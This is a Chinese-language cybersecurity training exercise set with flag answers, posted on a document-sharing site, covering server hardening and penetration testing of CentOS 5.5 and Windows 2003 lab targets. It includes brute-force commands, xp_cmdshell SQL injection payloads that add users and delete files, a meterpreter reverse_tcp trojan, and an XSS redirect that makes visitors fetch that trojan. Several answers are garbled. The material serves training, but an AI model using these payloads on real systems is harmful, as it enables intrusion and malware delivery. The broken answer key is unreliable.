网络空间安全实训题及讲解.docx - 冰豆网
当前位置:
首页 > 工作范文 > 其它 > 网络空间安全实训题及讲解.docx
网络空间安全实训题及讲解.docx
- 文档编号:3427918
- 上传时间:2022-11-23
- 格式:DOCX
- 页数:11
- 大小:255.89KB
网络空间安全实训题及讲解.docx
《网络空间安全实训题及讲解.docx》由会员分享,可在线阅读,更多相关《网络空间安全实训题及讲解.docx(11页珍藏版)》请在冰豆网上搜索。
网络空间安全实训题及讲解
训测二1-1在服务器场景CentOS5.5上通过Linux命令行开启mysql服务,并将开启该服务命令字符串作为flag值提交:
servicemysqldstart
训测二1-2在服务器场景CentOS5.5上进入mysql删除user表中host为127.0.0.1的用户,查询剩下用户记录,把查询结果倒数第二条记录的host字段值作为flag值提交:
localhost
训测二1-3在服务器场景CentOS5.5上进入mysql(使用grant语句)添加一个用户test密码为20170829,它的host为172.19.5.100,并赋予所有权限,将所输入代码作为flag值提交:
grantallprivilegesON*.*TO‘test’@’172.19.5.100’identifiedby‘20170829’withgrantoption;
训测二1-4在服务器场景CentOS5.5上进入mysql的配置文件,限制最大连接数为2,并将mysql的配置文件路径F1,及其增加的一行F2作为flag值提交:
格式为(F1|F2)
(/etc/f|max_user_connections=2)
训测二1-5在服务器场景CentOS5.5上进入mysql的配置文件,使其他主机不能远程连接数据库F1,并禁止对本地文件存取F2,将其增加行作为Flag值提交:
格式为{F1|F2}
{skip-networking|set-variable=local-infile=0}
训测二1-6在服务器场景CentOS5.5上进入mysql的配置文件,启动项加固,使访问能被审计,并将日志其路径作为flag值提交。
/usr/local/mysql/log/mysql.log
训测二1-7在服务器场景CentOS5.5上开启http服务,其配置文件的路径作为flag值提交:
/etc/httpd/conf/httpd.conf
训测二1-8在服务器场景CentOS5.5上进入httpd配置文件,将网站发布目录作为flag值提交:
/var/www/html
训测二1-9在服务器场景CentOS5.5上进入httpd配置文件修改代码使其在出现错误页的时候不显示服务器操作系统的名称。
将修改后的一行代码作为flag值提交:
ServerTokensProd
训测二1-10在服务器场景CentOS5.5上进入httpd配置文件修改代码使其不回显apache版本信息。
将修改后的代码作为flag值提交:
ServerSignatureOff
训测二1-11用渗透平台nmap扫描靶机CentOS5.5将其apache版本信息作为flag提交。
Apachehttpd2.2.3((CentOS))
训测二2-1在服务器场景Windows2003上对sqlserver2000进行sp4补丁安装,重启。
将其补丁的文件夹名字F1和增加的端口号(用netstat-an查询)F2作为flag值提交:
格式为:
F1|F2
SQL2KSP4|1433
训测二2-2在服务器场景Windows2003上进入sqlserver2000服务器使用存储过程添加系统用户njcx。
将其输入代码作为flag值提交:
execmaster.dbo.xp_cmdshell‘netusernjcx/add’
训测二2-3在服务器场景Windows2003上关闭xp_cmdshell服务,将其关闭的代码作为flag值提交:
execsp_dropextendedproc'xp_cmdshell'
训测二2-4在服务器场景Windows2003上开启xp_cmdshell服务,将其开启的代码作为flag值提交:
execsp_addextendedprocxp_cmdshell,'xplog70.dll'
训测二2-5在服务器场景Windows2003上使用netstat–an查看端口,并将http有关的一行作为flag值提交:
TCP0.0.0.0:
800.0.0.0:
0LISTENING
训测二2-6在服务器场景Windows2003上用浏览器打开网页127.0.0.1将其内容作为flag值提交。
训测二2-7用渗透平台nmap扫描靶机win2003将其iis版本作为flag提交。
MicrosoftIIShttpd6.0
训测三-1.1在服务器场景CentOS5.5上通过Linux命令行关闭ssh服务,将关闭该服命令字符串作为Flag值提交。
Servicesshdstop
训测三-1.2在服务器场景CentOS5.5上通过/Flag/ifconfig去查询ip地址,把flag的值作为flag提交。
sbin
训测三-1.3用渗透平台对服务器场景CentOS5.5进行综合扫描渗透测试,把显示结果正数第5行的四个单词作为flag值提交。
格式为:
|..|..|..|..|
|PORT|STATE|SERVICE|VERSION|
训测三-1.4在服务器场景CentOS5.5上通过Linux命令行开启ssh服务,将开启该服命令字符串作为Flag值提交。
/etc/init.d/sshdstart
训测三-1.5用渗透平台对服务器场景CentOS5.5进行hydra命令爆破使用所给字典。
把现实结果的倒数第二行的第二个数字F1和正确结果的login:
后面的字符串F2作为flag值提交。
格式为:
F1&F2
1&root
训测三-1.6用渗透平台对服务器场景CentOS5.5进行ssh远程登录并且使用wireshark对其进行协议分析,并把发送的第一个包的长度作为flag值提交
48
训测三-1.7用渗透平台对服务器场景CentOS5.5进行ssh远程登录并且使用wireshark对其进行协议分析,并把现实结果中物理mac地址加密方式作为flag值提交。
Hmac-md5
训测三-2.1打开靶机,使其与物理机上的window2003虚拟机建立ipsecvpn预共享秘钥为123123,用渗透平台wireshark对其进行监听,用其第一阶段的全称作为flag值提交。
InternetSecurityAssociationandKeyManageProtocol
训测三-2.2打开靶机,使其与物理机上的window2003虚拟机建立ipsecvpn,用渗透平台wireshark对其进行监听,用其第二阶段的全称作为flag值提交。
、
EncapsulatingSecurityPayload训测三-2.3打开靶机,使其与物理机上的window2003虚拟机建立ipsecvpn,用渗透平台wireshark对其进行监听,找到第一阶段现实结果中的Version:
后面的字符串作为flag提交。
1.0
训测三-2.4打开靶机,使其与物理机上的window2003虚拟机建立ipsecvpn,用渗透平台wireshark对其进行监听,找到第二阶段的显示结果的的倒数第一行作为flag值提交。
Data(68bytes)
训测三-3.1打开虚拟机2003中的Ethereal,监听到本机通过internetExplorer访问靶机服务器场景上的Test.html页面内容,并将Ethereal监听到的Test.html页面内容在Ethereal程序当中的显示结果倒数第二行内容作为flag值提交。
训测三-3.2在虚拟机2003与靶机2003之间建立sslvpn,须通过CA服务颁发证书;2003服务器域名为,并将2003服务器个人证书信息的“颁发给:
”内容作为flag值提交。
训测三-3.3在虚拟机2003与靶机2003之间建立sslvpn,再次打开Ethereal,监听InternetExplorer访问靶机2003服务器场景流量,验证此时Ethereal无法明文监听到intnetExplorer访问靶机2003场景的http流量,并将靶机2003服务器通过sslRecordLayer对internetExplorer请求响应的加密应用层数据长度Length值作为flag值提交。
301
训测四1-1通过渗透平台对CentOS5.5进行渗透,利用msf工具对其进行远程超级管理员口令破解,使其通过root用户登入目标靶机(密码为654321),并将漏洞的路径作为flag值提交。
auxiliary/scanner/ssh/ssh_login
训测四1-2对CentOS5.5服务器场景进行安全加固,阻止PC中渗透测试平台对服务器场景CentOS5.5进行远程超级管理员口令暴力破解,并将配置文件路径及配置文件加固的内容字符串作为Flag提交。
格式为:
F1&F2
/etc/ssh/sshd_config&PermitRootLoginno
训测四1-3再次通过渗透平台对CentOS5.5进行渗透,利用msf工具对其进行远程超级管理员口令破解,使其通过root用户登入目标靶机,并将现实结果的倒数第二行作为flag值提交:
[*]Scanned1of1hosts(100%complete)
训测四1-4在服务器场景CentOS5.5上通过Linux命令行添加用户userl,并配置密码。
将添加用户的命令字符串F1与配置密码的命令字符串F2作为Flag值提交;格式为:
F1&F2&F3……
adduseruserl&passworduserl
训测四1-5在服务器场景CentOS5.5上开启http服务,其配置文件的路径作为flag值提交:
/etc/httpd/conf/httpd.conf
训测四1-6通过PC2中渗透测试平台对服务器场景CentOS5.5进行操作系统综合扫描渗透测试(使用工具NMAP,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;
A
训测四1-9通过渗透平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用arping,发送请求数据包数量为5个),并将该操作使用命令中固定不变的字符串作为flag提交;
arping–t5
训测四1-10通过渗透平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用arping,发送请求数据包数量为5个),并将该操作结果的最后1行,从左边数第二个数字作为flag提交;
5
训测四2-1在靶机与虚拟机上做ipsecvpn,组阻止Sniffer监听渗透测试,虚拟机通过ping访问WebServ2003服务器,将第一个数据包回显结果作为flag提交;
NegotiatingIPSecurity.
训测四2-2打开靶机,使其与物理机上的window2003虚拟机建立ipsecvpn,用渗透平台wireshark对其进行监听,找到第二阶段的显示结果的的倒数第一行作为flag值提交。
Data(68bytes)
训测四2-3在虚拟机2003与靶机2003之间建立sslvpn,再次打开Ethereal,监听InternetExplorer访问靶机2003服务器场景流量,验证此时Ethereal无法明文监听到intnetExplorer访问靶机2003场景的http流量,并将靶机2003服务器通过sslRecordLayer对internetExplorer请求响应的加密应用层数据长度Length值作为flag值提交。
训测四2-4在服务器场景Windows2003上对sqlserver2000进行sp4补丁安装,重启,将增加的端口整行信息作为flag值提交。
TCP0.0.0.0:
14330.0.0.0:
0LISTENING
训测四2-5通过PC中的渗透测试平台对服务器场景WebServ2003进行数据库服务扫描渗透测试,并将扫描结果作为Flag提交;
训测四2-6通过对服务器场景WebServ2003的数据库服务进行安全加固,阻止PC中渗透测试平台对其进行数据库超级管理员密码暴力破解渗透测试,并将加固身份验证选项中的最后一个字符串作为Flag提交。
Windows[w]
训测四2-7查找windows2003靶机里的完整的计算机名称作为flag值提交;hh-admin
训测四2-8查找windows2003靶机系统属性中‘系统:
’后的字符串作为flag值提交;
MicrosoftWindowsServer2003StandardEdition
训测四2-9查找windows2003靶机来宾访客用户的名称,将其作为flag值提交;Guest
训测四2-10查找windows2003靶机的默认共享名,并将查找命令F1与默认共享名F2作为flag值提交。
格式为:
F1-F2
netshare-C$
训测五1-1使用bt5对靶机进行渗透测试,通过暴力破解ssh密码登录系统,并将密码作为flag值提交;
981
训测五1-2在服务器场景CentOS5.5上通过Linux命令行开启HTTP服务,并将开启该服务命令字符串作为Flag值提交;
/etc/init.d/httpdstart
训测五1-4通过PC中渗透测试平台对服务器场景CentOS5.5进行操作系统扫描渗透测试(使用工具NMAP,使用必须要使用的参数),并将该操作显示结果“OSDetails:
”之后的字符串作为Flag提交;
Linux2.6.9
训测五1-5在服务器场景CentOS5.5上通过Linux命令行关闭ssh服务,再次打开bt5,行操作系统综合扫描渗透测试,将关闭该服务命令字符串以及第二个服务信息作为Flag值提交;格式为:
f1|f2
servicesshdstop|111/tcpopenrpcbind(rpcbindV2)2(rpc#100000)
训测五1-6在服务器场景CentOS5.5上通过Linux命令行添加用户Za,添加密码并且给予root权限,将命令字符串作为Flag值提交;格式为:
F1|F2|F3
useraddZa|passwdZa|usermod–grootZa
训测五1-9在服务器场景CentOS5.5上进入httpd配置文件修改代码使其在出现错误页的时候不显示服务器操作系统的名称。
将修改后的一行代码作为flag值提交:
ServerTokensProd
训测五1-10在服务器场景CentOS5.5上进入httpd配置文件修改代码使其不回显apache版本信息。
将修改后的代码作为flag值提交:
ServerSignatureOff
训测五-1-11在服务器场景CentOS5.5上通过/…/ifconfig去查询ip地址,把…的值作为flag提交。
sbin
训测五-1-12用渗透平台对服务器场景CentOS5.5进行ssh远程登录并且使用wireshark对其进行协议分析,并把发送的第一个包的长度及encryption加密算法作为flag值提交;格式为f1-f2
48-aes128-ctr
训测五-1-13通过PC中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),并将工具Metasploit中arp_sweep模块存放路径字符串作为Flag(形式:
字符串1/字符串2/字符串3..)提交;
auxiliary/scanner/discovery/arp_sweep
训测五-1-14通过PC中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交;
appears
训测五-1-15通过通过PC中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的倒数第二个单词作为Flag提交;
execution
训测五-1-16通过PC中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交;
exploit
训测五2-1在服务器场景Windows2003上对sqlserver2000进行sp4补丁安装,重启。
将其补丁的文件夹名字F1和增加的端口号信息(用netstat-an查询)F2作为flag值提交:
格式为:
F1|F2
SQL2KSP4|TCP0.0.0.0:
14330.0.0.0:
0LISTENING
训测五2-2在bt5上使用hydra暴力破解sql-server数据库(mssql),并将其爆破结果中正确结果login:
结果和password:
结果作为flag值提交;格式为f1&f2
sa&1234
训测五2-3在靶机2003上打开sql-server,进行存储过程,在c盘下创建文件夹njcx,将其过程作为flag值提交。
execmaster.dbo.xp_cmdshell‘mdc:
\njcx’
训测五-2-4在虚拟机2003与靶机2003之间建立sslvpn,再次打开Ethereal,监听InternetExplorer访问靶机2003服务器场景流量,验证此时Ethereal无法明文监听到intnetExplorer访问靶机2003场景的http流量,并将靶机2003服务器通过sslRecordLayer对internetExplorer请求响应的加密应用层数据长度Length值作为flag值提交。
299
信息安全管理与评估补充题
1.配置靶机WebServ2003的DHCP功能,能够分配IP的范围为172.19.X.X(111~150),XP客户端申请IP地址,将第二阶段和第四的数据包类型作为Flag值提交,格式为:
F1-F2;
DHCPOFFER
DHCPACK
2.使用渗透机攻击WebServ2003,进行DHCP地址池耗尽攻击,把使用中的IP地址数比例作为Flag提交;
100%
3.进入loginAuth.php程序,修改PHP源程序,使之可以抵御SQL注入,并填补空缺处内容,将填补内容作为Flag提交,格式为F1|F2|F3;
Mssql_select_db
Password
$password
4.再次对该任务loginAuth.php页面注入点进行渗透测试,验证此次利用任意用户进行SQL注入渗透测试无效,并将回显提示信息作为Flag提交。
UsernameDoesNotExist
5.Web继续访问WebServ2003服务器,"/"->"EmployeeInformationQuery",分析该页面源程序,找到提交的变量名,并作为Flag提交。
usernm
5.Web继续访问WebServ2003服务器,"/"->"EmployeeInformationQuery",分析该页面源程序,将表单提交方式作为Flag提交。
get
6.Web继续访问WebServ2003服务器,"/"->"EmployeeInformationQuery",分析该页面源程序,表单提交后跳转页面的路径作为Flag提交。
list.html
7.对"EmployeeInformationQuery"页面注入点进行渗透测试,根据输入“%”以及“_”的返回结果确定是注入点,并将显示结果倒数第三行内容作为Flag提交;
Email:
ww@
9.通过对该任务题目5页面注入点进行SQL注入渗透测试,删除WebServ2003服务器的C:
\目录下的1.txt文档,并将注入代码作为Flag提交。
‘execmaster.dbo.xp_cmdshell‘delc:
\1.txt’—
10.进入WebServ2003服务器的C:
\AppServ\www目录,找到QueryCtrl.php程序,分析并修改PHP源程序,将‘%’替换为‘\%’,‘_’替换为‘\_’使之可以抵御SQL注入渗透测试,并将修改后新增语句内容作为Flag提交。
格式为F1-F2-F3…
$keyWord=addslashes($KeyWord);
$keyWord=str_replace(“%”,”\”,$KeyWord);
$keyWord=str_replace(“%_”,”\_”,$KeyWord);
11.再次对该任务题目5页面注入点进行渗透测试,验证此次利用注入点对该WebServer进行SQL注入渗透测试无效,并将验证过程截图。
将系统出现的错误提示作为Flag提交。
BadKeyWord!
12.进入WebServ2003服务器,禁用系统存储过程可以抵御SQL注入渗透测试,将禁用系统存储的语句作为Flag提交。
格式为Y1-Y2-Y3-Y4...
13.进入"/"->"EmployeeMessageBoard"->"DisplayMessage"页面,再次对页面注入点进行渗透测试,调用存储过程删除WebServ2003服务器的C:
\目录下的1.txt文档,将页面提示第一个字符串作为Flag提交;
Warning
14.进入"/"->"EmployeeMessageBoard"->"DisplayMessage"页面进行XSS渗透测试,循环弹框"Hacker!
",根据该页面的显示,确定是注入点,并将构造的注入代码作为Flag提交。
15.通过IIS搭建网站(http:
//hacker.org/),并通过渗透机生成木马程序TrojanHorse.exe,将使用的工具和模块路径作为Flag提交。
格式为{F1&F2}
msfpayload
Windows/meterpreter/reverse_tcp
16.对该任务题目1页面注入点进行渗透测试,使"/"->"EmployeeMessageBoard"->"DisplayMessage"页面的访问者执行网站(http:
//hacker.org/)中的木马程序:
http:
//hacker.org/TrojanHorse.exe,并将注入代码作为Flag提交。
Location.href=“htt:
//hacker.org/TrojanHorse.exe”;
17.进入WebServ2003服务器的C:
\AppServ\www目录,找到insert.php程序,分析并修改PHP源程序,使用‘{’替‘<’、‘}’替换‘>’,使之可以抵御XSS渗透测试,并将需要使用的函数和增加语句作为Flag提交。
格式为[F1/F2]
Str_replace
$info=str_replace(“<”,”{”,$info);
$info
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
-
网络
空间
安全
实训题
讲解
冰豆网所有资源均是用户自行上传分享,仅供网友学习交流,未经上传用户书面授权,请勿作他用。